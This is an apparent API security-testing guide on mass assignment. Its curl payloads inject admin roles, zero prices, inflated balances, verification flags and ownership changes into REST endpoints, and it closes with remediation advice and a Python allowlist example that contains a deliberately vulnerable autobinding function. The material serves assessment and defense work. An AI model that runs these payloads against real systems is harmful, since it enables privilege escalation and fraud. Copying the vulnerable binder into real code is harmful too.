Discovers and exploits mass assignment vulnerabilities in REST APIs by injecting unexpected parameters to escalate privileges, modify restricted fields, and bypass authorization. Useful for API security assessments and bug bounties.
- When testing REST APIs that accept JSON input for creating or updating resources
```bash
# Inspect the API response to enumerate all object fields
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# The response reveals fields: id, username, email, role, isAdmin, verified, balance

# Check the API documentation for exposed schemas
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml

# Discover hidden parameters with Arjun
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"

# Compare create/update request bodies with the response bodies
# The response may contain more fields than the request sent
# Those extra fields are mass assignment candidates

# Inject role/admin fields into a profile update
curl -X PUT http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","email":"test@test.com","role":"admin"}'

# Try common admin field names
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"isAdmin":true}'
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'

# Test during registration
curl -X POST http://target.com/api/register \
  -H "Content-Type: application/json" \
  -d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'

# Modify price or balance fields
curl -X POST http://target.com/api/orders \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id":1,"quantity":1,"price":0.01}'

# Modify the account balance
curl -X PATCH http://target.com/api/wallet \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"balance":999999}'

# Modify discount or coupon fields
curl -X POST http://target.com/api/checkout \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'

# Modify the subscription tier
curl -X PATCH http://target.com/api/subscription \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"plan":"enterprise","price":0}'

# Bypass email verification
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email_verified":true,"verified":true,"active":true}'

# Modify account status
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"status":"active","banned":false,"suspended":false}'

# Modify ownership/organization
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'

# Change resource ownership
curl -X PATCH http://target.com/api/documents/123 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"owner_id":"admin-user-id"}'

# Assign to a different group/team
curl -X PATCH http://target.com/api/projects/456 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"team_id":"privileged-team","access_level":"write"}'

# Modify created_at/updated_at to tamper with the audit trail
curl -X PATCH http://target.com/api/entries/789 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"created_at":"2020-01-01","created_by":"other-user-id"}'

# Use Burp Intruder with a field-name wordlist
# Common mass assignment field wordlist:
# role, admin, isAdmin, is_admin, user_type, privilege, level
# verified, email_verified, active, banned, suspended
# balance, credits, price, discount, plan, tier
# owner_id, organization_id, team_id, group_id

# Python automation script
python3 mass_assignment_tester.py \
  --url http://target.com/api/users/me \
  --method PATCH \
  --token "Bearer USER_TOKEN" \
  --fields-file mass_assignment_fields.txt

# Nuclei mass assignment template
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yaml
```

| Concept | Definition |
|---|---|
| Mass Assignment | The ORM binds request parameters to model attributes automatically and without restriction |
| Autobinding | Framework feature that maps HTTP parameters directly onto object properties |
| Allowlist | Server-side list of fields permitted in update operations (strong_parameters in Rails) |
| Denylist | List of forbidden fields (less secure than the allowlist approach) |
| Hidden Fields | Server-managed fields (role, balance) that are not shown in forms but are still accepted by the API |
| DTO (Data Transfer Object) | Pattern that uses a separate object to decouple input from the database, preventing mass assignment |
| Parameter Pollution | Sending unexpected extra parameters alongside legitimate ones |

| Tool | Purpose |
|---|---|
| Burp Suite | API request interception and parameter injection |
| Postman | API testing and collection-based mass assignment testing |
| Arjun | Hidden parameter discovery for API endpoints |
| param-miner | Burp extension for discovering hidden parameters |
| OWASP ZAP | Automated API scanning with parameter injection |
| swagger-codegen | Generates API clients from OpenAPI specifications for testing |

Typical impact of an injected field:

- `"role":"admin"` or `"isAdmin":true` to gain administrative access
- `price` or `discount` fields to buy items at a lower price
- `email_verified:true` to bypass verification requirements
- changing the `email` or `phone` field to an attacker-controlled value, then triggering a password reset
- `plan:"enterprise"` to obtain premium features without paying

## Mass Assignment Vulnerability Report
- **Target**: http://target.com/api/users/me
- **Method**: PATCH
- **Framework**: Ruby on Rails (detected via X-Powered-By)

### Findings

| # | Endpoint | Injected Field | Original Value | Modified Value | Impact |
|---|---|---|---|---|---|
| 1 | PATCH /api/users/me | role | "user" | "admin" | Privilege escalation |
| 2 | POST /api/orders | price | 99.99 | 0.01 | Financial loss |
| 3 | PATCH /api/users/me | email_verified | false | true | Verification bypass |

### Remediation

- Implement an allowlist (strong_parameters) for every model update operation
- Use DTOs/ViewModels to decouple API input from database models
- Apply field-level authorization checks to sensitive attributes
- Log and alert on attempts to modify restricted fields
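To make the remediation concrete, the following Python example contrasts the autobinding defect this skill tests for with an allowlist update handler that also emits the audit record the last recommendation asks for. It is an added example, not code from the original skill or from Rails, Django, Laravel or any other framework; the `User` model, `USER_UPDATE_ALLOWLIST`, `RESTRICTED_FIELDS` (populated from the field wordlist above) and the `audit_event` record layout are all assumptions made for illustration.

```python
"""Mass assignment: autobinding vs. allowlist binding with audit events.

Added example; not code from the original skill or from any framework.
The User model, the allowlist and the audit-event layout are assumptions.
"""
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple

# Server-managed fields a client must never set directly. The names come from
# the field wordlist above; the set itself is constructed for this example.
RESTRICTED_FIELDS = frozenset({
    "id", "role", "admin", "isAdmin", "is_admin", "user_type", "privilege_level",
    "verified", "email_verified", "active", "banned", "suspended",
    "balance", "credits", "owner_id", "organization_id", "team_id",
    "created_at", "updated_at", "created_by",
})

# Fields a user may change on their own profile (the allowlist, an assumption).
USER_UPDATE_ALLOWLIST = frozenset({"username", "email"})


@dataclass
class User:
    """Toy model standing in for an ORM-backed row (assumption)."""
    id: int
    username: str
    email: str
    role: str = "user"
    email_verified: bool = False
    balance: float = 0.0


def update_user_vulnerable(user: User, payload: Dict[str, Any]) -> User:
    """Autobinding: every key in the JSON body becomes a model attribute.

    This reproduces the defect the skill tests for and is intentionally
    insecure: {"role": "admin"} in the body silently promotes the caller.
    """
    for key, value in payload.items():
        setattr(user, key, value)
    return user


def update_user_safe(user: User, payload: Dict[str, Any]) -> Tuple[User, List[str]]:
    """Allowlist binding (the strong_parameters idea).

    Only allowlisted keys are copied onto the model; every other key is dropped
    and returned so the caller can log or alert on it.
    """
    rejected = sorted(key for key in payload if key not in USER_UPDATE_ALLOWLIST)
    for key in USER_UPDATE_ALLOWLIST.intersection(payload):
        setattr(user, key, payload[key])
    return user, rejected


def audit_event(actor_id: int, endpoint: str, rejected: List[str]) -> Optional[Dict[str, Any]]:
    """Build the log/alert record for fields the allowlist dropped.

    Unknown extra keys are usually client bugs (severity "low"); an attempt to
    write a server-managed field such as role or balance is a probe worth
    alerting on (severity "high"). Returns None when nothing was rejected.
    """
    if not rejected:
        return None
    restricted = sorted(f for f in rejected if f in RESTRICTED_FIELDS)
    return {
        "event": "mass_assignment_attempt" if restricted else "unknown_fields_dropped",
        "severity": "high" if restricted else "low",
        "actor_id": actor_id,
        "endpoint": endpoint,
        "rejected_fields": rejected,
        "restricted_fields": restricted,
    }


if __name__ == "__main__":
    # Constructed request body mirroring the first privilege-escalation test above.
    body = {"username": "testuser", "email": "test@test.com", "role": "admin"}

    victim = User(1, "alice", "alice@example.com")
    update_user_vulnerable(victim, dict(body))
    print("autobinding ->", victim.role)  # admin

    hardened = User(2, "bob", "bob@example.com")
    _, rejected = update_user_safe(hardened, dict(body))
    print("allowlist   ->", hardened.role, rejected)  # user ['role']
    print(audit_event(2, "PATCH /api/users/me", rejected))
```

The split between `rejected_fields` and `restricted_fields` is the detection hook: a single unknown key from one client is noise, but a `role`, `balance` or `owner_id` key appearing on a self-service endpoint is exactly the probe the curl commands above perform, and deserves an alert rather than a debug-level log line.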